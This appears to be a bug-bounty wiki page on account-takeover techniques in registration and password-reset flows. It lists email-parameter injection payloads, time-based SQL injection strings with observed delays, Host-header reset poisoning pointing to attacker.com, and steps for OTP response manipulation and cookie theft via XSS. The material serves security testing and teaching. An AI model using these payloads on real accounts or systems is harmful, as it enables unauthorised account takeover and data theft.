Sec-88
  • 🧑Whoami
  • 🕸️Web-AppSec
    • Features Abuse
      • 2FA
      • Ban Feature
      • CAPTCHA
      • Commenting
      • Contact us
      • File-Upload
      • Inviting Feature
      • Messaging Features
      • Money-Related Features
      • Newsletter
      • Profile - Settings
      • Registration
      • Reset Password
      • Review
      • Rich Editor/Text
      • Social Sharing
      • Billing-Shipping Address Management
      • Integrations - Webhooks
      • API Key Management
    • Reconnaissance
      • Attacking Organizations with big scopes
    • Subdomain Enumeration
    • Fingerprinting
    • Dorking
    • XSS-HTML Injection
    • Improper Authentication
      • JWT Security
    • OAUTH Misconfigurations
      • OAuth 2.0 Basics
      • OAUTH Misconfigurations
    • Auth0 Misconfigurations
    • Broken Access Control
      • Insecure Direct Object References (IDOR)
      • 403 Bypass
    • Broken Link Injection
    • Command Injection
    • CORS
    • CRLF
    • CSRF
    • Host Header Attacks
    • HTTP request smuggling
    • JSON Request Testing
    • LFI
      • LFI to RCE
    • No Rate Limit
    • Parameters Manual Testing
    • Open Redirect
    • Registration & Takeover Bugs
    • Remote Code Execution (RCE)
    • Session Fixation
    • SQL Injection
      • SQL To RCE
    • SSRF
    • SSTI
    • Subdomain Takeover
    • Web Caching Vulnerabilities
    • WebSockets
    • XXE
      • XXE to RCE
    • Cookie Based Attacks
    • CMS
      • AEM [Adobe CMS]
    • XSSI (Cross Site Script Inclusion)
    • NoSQL injection
    • Local VS Remote Session Fixation
    • Protection
      • Security Mechanisms for Websites
      • Cookie Flags
      • SameSite Cookie Restrictions
      • Same-origin policy (SOP)
      • CSP
    • Hacking IIS Applications
    • Dependency Confusion
    • Attacking Secondary Context
    • Hacking Web Sockets
    • IDN Homograph Attack
    • DNS Rebinding Attack
    • LLM Hacking Checklist
    • Bypass URL Filtration
    • Cross-Site Path Traversal (CSPT)
    • PostMessage Security
    • Prototype Pollution
      • Client-Side Prototype Pollution
      • Server-Side prototype pollution
    • Tools-Extensions-Bookmarks
    • WAF Bypassing Techniques
    • SSL/TLS Certificate Lifecycle
    • Serialization in .NET
    • Client-Side Attacks
      • JavaScript Analysis
    • Bug Bounty Platforms/Programs
    • DNS Dangling / NS Takeover
  • ✉️API-Sec
    • GraphQL API Security Testing
      • The Basics
      • GraphQL Communication
      • Setting Up a Vulnerable GraphQL Server
      • GraphQL Hacking Tools
      • GraphQL Attack Surface
      • RECONNAISSANCE
      • GraphQL DOS
      • Information Disclosure
      • AUTHENTICATION AND AUTHORIZATION BYPASSES
      • Injection Vulnerabilities in GraphQL
      • REQUEST FORGERY AND HIJACKING
      • VULNERABILITIES, REPORTS AND EXPLOITS
      • GraphQL Hacking Checklist
    • API Recon
    • API Token Attacks
    • Broken Object Level Authorization (BOLA)
    • Broken Authentication
    • Evasive Maneuvers
    • Improper Assets Management
    • Mass Assignment Attacks
    • SSRF
    • Injection Vulnerabilities
    • Excessive Data Exposure
    • OWASP API TOP 10 MindMap
    • Scanning APIs with OWASP ZAP
  • 📱Android-AppSec
    • Setup Android App Pentesting environment on Arch
    • Setup Android App Pentesting environment on Mac M4
    • Setup Android Pentesting Environment on Debian Linux
    • Android App Fundamentals
      • Android Architecture
      • Android Security Model
      • Android App Components
        • Intents
        • Pending Intents
    • Android App Components Security Cheatsheet
    • Android App Pentesting Checklist
    • How To Get APK file for application
    • ADB Commands
    • APK structure
    • Android Permissions
    • Exported Activity Hacking
    • BroadcastReceiver Hacking
    • Content Provider Hacking
    • Signing the APK
    • Reverse Engineering APK
    • Deep Links Hacking
    • Drozer Cheat Sheet
    • SMALI
      • SMALI Cheat Sheet
      • Smali Code Patching Guide
    • Intent Redirection Vulnerability
    • Janus Vulnerability (CVE-2017-13156)
    • Task Hijacking
    • Hacking Labs
      • Injured Android
      • Hacking the VulnWebView Lab
      • Hacking InsecureBankv2 App
    • Frida Cheat Sheet
  • 📶Network-Sec
    • Networking Fundamentals
    • Open Ports Security Testing
    • Vulnerability Scanning
    • Client Side Attacks
    • Port Redirection and Tunneling
    • Password Attacks
    • Privilege Escalation [PrevEsc]
      • Linux Privilege Escalation
    • Buffer Overflow (BOF)
      • VulnServer
      • Sync Breez Enterprize
      • Crashed CTF
      • BOF for Linux
    • AV Evasion
    • Post Exploitation
      • File Transfer
      • Maintaining Access
      • Pivoting
      • Clean Up
    • Active Directory
      • Basic AD Pentesting
  • 💻Desktop AppSec
    • Thin Client vs. Thick Client
  • ☁️Cloud Sec
    • Salesforce Hacking
      • Basics
      • Salesforce SAAS Apps Hacking
    • Firebase
    • S3 Buckets Misconfigurations
    • Amazon Cognito Misconfiguraitons
  • 👨‍💻Programming
    • HTML
    • JavaScript (JS)
      • window.location object
    • Python
      • Python Tips
      • Set
        • SetMethods
    • JAVA
      • Java Essentials
      • Java Essentials Code Notes
      • Java OOP1
      • JAVA OOP Principles
        • Inheritance
        • Method Overriding
        • Abstract Class
        • Interface
        • polymorphism
        • Encapsulation
        • Composition
      • Java OOP Challenges
      • Exception Handling
    • Go
      • Go Syntax Tutorial in one file
      • Methods and Interfaces
      • Go Slices
      • Go Maps
      • Go Functions
      • Concurrency
      • Read Files
      • Write Files
      • Package
        • How to make personal Package
        • regexp Packages
        • Json
        • bufio
        • Time
      • Signals-Exit
      • Unit Testing
  • 🖥️Operating Systems
    • Linux
      • Linux Commands
      • Tools
      • Linux File System
      • Bash Scripting guide
      • tmux
      • Git
      • Install Go tools from private repositories using GitHub PAT
    • VPS
    • Burp Suite
  • ✍️Write-Ups
    • Hunting Methodology
    • API BAC leads to PII Data Disclosure
    • Misconfigured OATUH leads to Pre-Account Takeover
    • Automating Bug Bounty with GitHub Actions
    • From Recon to Reward: My Bug Bounty Methodology when Hunting on Public Bug Bounty Programs
    • Exploring Subdomains: From Enumeration to Takeover Victory
    • 0-Click Account Takeover via Insecure Password Reset Feature
    • How a Simple Click Can Lead to Account Takeover: An OAuth Insecure Implementation Vulnerability
    • The Power Of IDOR even if it is unpredictable IDs
    • Unlocking the Weak Spot: Exploiting Insecure Password Reset Tokens
    • AI Under Siege: Discovering and Exploiting Vulnerabilities
    • Inside the Classroom: How We Hacked Our Way Past Authorization on a Leading EdTech Platform
    • How We Secured Our Client’s Platform Against Interaction-Free Account Thefts
    • Unchecked Privileges: The Hidden Risk of Role Escalation in Collaborative Platforms
    • Decoding Server Behavior: The Key to Mass Account Takeover
    • Exploiting JSON-Based CSRF: The Hidden Threat in Profile Management
    • How We Turned a Medium XSS into a High Bounty by Bypassing HttpOnly Cookie
Powered by GitBook
On this page
  • Change email Feature
  • More Checks
  • Password Reset Takeover
  • Leaking Sensitive Info in Response
  • IDOR on API Parameters
  • XSS to ATO
  • CSRF to ATO
  • ATO via JWT
  • Using MFA/OTP issues
  • Authentication Bypass Via Response Manipulation
  • SSRF to ATO
  • Remote session Fixation to ATO

Was this helpful?

Edit on GitHub
  1. Web-AppSec

Registration & Takeover Bugs

( Credits: HackTricks )

ATO from manipulating the email Parameter

# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
#No domain:
email=victim
#No TLD (Top Level Domain):
email=victim@xyz
#change param case 
email=victim@mail.com&Email=attacker@mail.com
email@email.com**,**victim@hack.secry  
email@email**“,”**victim@hack.secry  
email@email.com**:**victim@hack.secry  
email@email.com**%0d%0a**victim@hack.secry  
**%0d%0a**victim@hack.secry  
**%0a**victim@hack.secry  
victim@hack.secry**%0d%0a**  
victim@hack.secry**%0a**  
victim@hack.secry**%0d** 
victim@hack.secry**%00**  
victim@hack.secry**{{}}**

ATO Via Request Smuggling

# Single Host: 
python3 smuggler.py -u <URL> 
# List of hosts: 
cat list_of_hosts.txt | python3 smuggler.py

Duplicate Registration

  1. Make 2 Accounts Same in everything [username and another things] but with Different email ID >> ATO

    • Create user named: AdMIn (uppercase & lowercase letters)

    • Create a user named: admin=

    • SQL Truncation Attack (when there is some kind of length limit in the username or email) --> Create user with name: admin [a lot of spaces] a

  2. Play with email Parameter

    • uppsercase

    • +1@

    • add some some in the email

    • special characters in the email name (%00, %09, %20)

    • Put black characters after the email: test@test.com a

    • victim@gmail.com@attacker.com

    • victim@attacker.com@gmail.com

SQL Injection

  • In email field

# SQLI in Email Field 
{"email":"asd'a@a.com"} --> Not Valid 
{"email":"asd'or'1'='1@a.com" } --> valid 
{"email":"a'-IF(LENGTH(database())>9,SLEE P(7),0)or'1'='1@a.com"} --> Not Valid 
{"email":"a'-IF(LENGTH(database())>9,SLEE P(7),0)or'1'='1@a.com"} -> Valid --> Delay: 7,854 milis 
{"email":"\\"a'-IF(LENGTH(database())=10,SLEEP(7),0)or'1'='1\\"@a.com"} --> {"code":0,"status":200,"message":"Berhasil"} --> Valid --> Delay 8,696 milis 
{"email":"\\"a"-IF(LENGTH(database())=11,SLEEP(7),0)or'1'='1\\"@a.com"} ---> {"code":0,"status":200,"message":"Berhasil"} ---> Valid --> No delay 
 # Resources 
 https://dimazarno.medium.com/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17
  • Insert Statement | Modify password of existing object/user To do so you should try to create a new object named as the "master object" (probably admin in case of users) modifying something:

    • Create user named: AdMIn (uppercase & lowercase letters)

    • Create a user named: admin=

    • SQL Truncation Attack (when ere is some kind of length limit in the username or email) --> Create user with name: admin [a lot of spaces] a

OAUTH Takeovers

[[OAUTH to ATO]]

SAML Vulnerabilities

Change email Feature

More Checks

Password Reset Takeover

Password Reset Token Leak Via Referrer

  1. Request password reset to your email address

  2. Click on the password reset link

  3. Don’t change password

  4. Click any 3rd party websites(eg: Facebook, twitter)

  5. Intercept the request in Burp Suite proxy

  6. Check if the referrer header is leaking password reset token.

Password Reset Poisoning

[[Host Header Injection]]

  1. Intercept the password reset request in Burp Suite

  2. Add or edit the following headers in Burp Suite : Host: attacker.com, X-Forwarded-Host: attacker.com

  3. Forward the request with the modified header http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com

  4. Look for a password reset URL based on the host header like : https://attacker.com/reset-password.php?token=TOKEN

Weak Password Reset Token

The password reset token should be randomly generated and unique every time. Try to determine if the token expire or if it’s always the same, in some cases the generation algorithm is weak and can be guessed. The following variables might be used by the algorithm.

- Timestamp
- UserID
- Email of User
- Firstname and Lastname
- Date of Birth
- Cryptography
- Number only
- Small token sequence ( characters between [A-Z,a-z,0-9])
- Token reuse
- Token expiration date

Password Reset Via Username Collision

  1. Register on the system with a username identical to the victim’s username, but with white spaces inserted before and/or after the username. e.g: "admin "

  2. Request a password reset with your malicious username.

  3. Use the token sent to your email and reset the victim password.

  4. Connect to the victim account with the new password.

Leaking Sensitive Info in Response

  • Steps(For Registration):

  1. For registeration intercept the signup request that contains the data you have entered.
  2. Click on action -> do -> intercept the response to this request.
  3. Click forward.
  4. Check response if that contains any link, any token or OTP.

  • Steps (For password reset):

 1. Intercept the forget password option.
 2. Click on action -> do -> intercept the response to this request.
 3. Click forward.
 4. Check response if that contains any link,any token or OTP.

IDOR on API Parameters

  1. Attacker have to login with their account and go to the Change password feature.

  2. Start the Burp Suite and Intercept the request

  3. Send it to the repeater tab and edit the parameters : User ID/email powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

XSS to ATO

[[HowToHunt-master/XSS/Xss]]

  • Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain : *.domain.com

  • Leak the current sessions cookie

  • Authenticate as the user using the cookie

CSRF to ATO

[[HowToHunt-master/CSRF/CSRF]]

  1. Change Password function.

  2. Email change

  3. Change Security Question


  1. Create a payload for the CSRF, e.g: “HTML form with auto submit for a password change”

  2. Send the payload

ATO via JWT

Using MFA/OTP issues

Authentication Bypass Via Response Manipulation

[[Authentication Bugs]]

Check out Auth Bypass method, there is a method for OTP bypass via response manipulation, this can leads to account takeovers.
1.Enter the wrong auth code / Password
2.Capture a auth request in burpsuite and send it to repeater 
3.Check for the resoponse
4.Change the respone by manipulating the following parameters
  {“code”:”invalid_credentials”} -> {“code”:”valid_credentials”}
  {“verify”:”false”}             -> {“verify”:”true”}

SSRF to ATO

https://infosecwriteups.com/hubspot-full-account-takeover-in-bug-bounty-4e2047914ab5

Remote session Fixation to ATO

https://hackerone.com/reports/423136

PreviousOpen RedirectNextRemote Code Execution (RCE)

Last updated 1 year ago

Was this helpful?

Disable 2FA via CSRF [[OTP_Bypass]]

🕸️
HTTP Request Smuggling leads to Full Accounts takeover
Duplicate Registration - The Twinning Twins | by Jerry Shah (Jerry) | Medium
SAML Attacks - HackTricks
An Interesting Account Takeover Vulnerability | by Avanish Pathak | Medium